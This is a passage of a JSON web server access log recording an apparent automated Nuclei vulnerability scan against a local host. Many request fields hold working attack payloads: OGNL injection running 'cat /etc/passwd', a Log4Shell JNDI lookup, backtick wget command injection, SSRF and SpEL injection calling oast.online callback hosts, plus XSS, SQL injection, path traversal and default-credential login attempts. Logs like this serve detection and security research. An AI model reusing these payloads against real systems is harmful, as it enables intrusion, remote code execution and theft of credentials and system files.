true).toString().substring(0,0) +\x0D\x0A(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\x0D\x0A(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\x0D\x0A(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryl7d1B1aGsV2wcZwF\xE2\x80\x94\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://c9v8gc8smpv8b0ng0t00m3tmkawujco8k.oast.online/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://c9v8gc8smpv8b0ng0t00ccgxqhgppuh34.oast.online/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://c9v8gc8smpv8b0ng0t00qe78h7uocnewe.oast.online\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/297MFmXlda6ZnaLI60N943VdOWq], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x22297MFmXlda6ZnaLI60N943VdOWq\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22c9v8gc8smpv8b0ng0t00qtbdw7p7qtyru.oast.online\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pics/logo_70x29px.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"url=https://127.0.0.1:443@c9v8gc8smpv8b0ng0t00jft347fw3wsge.oast.online\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/cgi-bin/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"action=&token=`wget http://c9v8gc8smpv8b0ng0t00t9j535tjye981.oast.online`&mode=`wget http://c9v8gc8smpv8b0ng0t005wtfa3jpujjaw.oast.online`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /storfs-asup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/297MFmXlda6ZnaLI60N943VdOWq HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios4/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.c9v8gc8smpv8b0ng0t006curejehtkci9.oast.online}"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 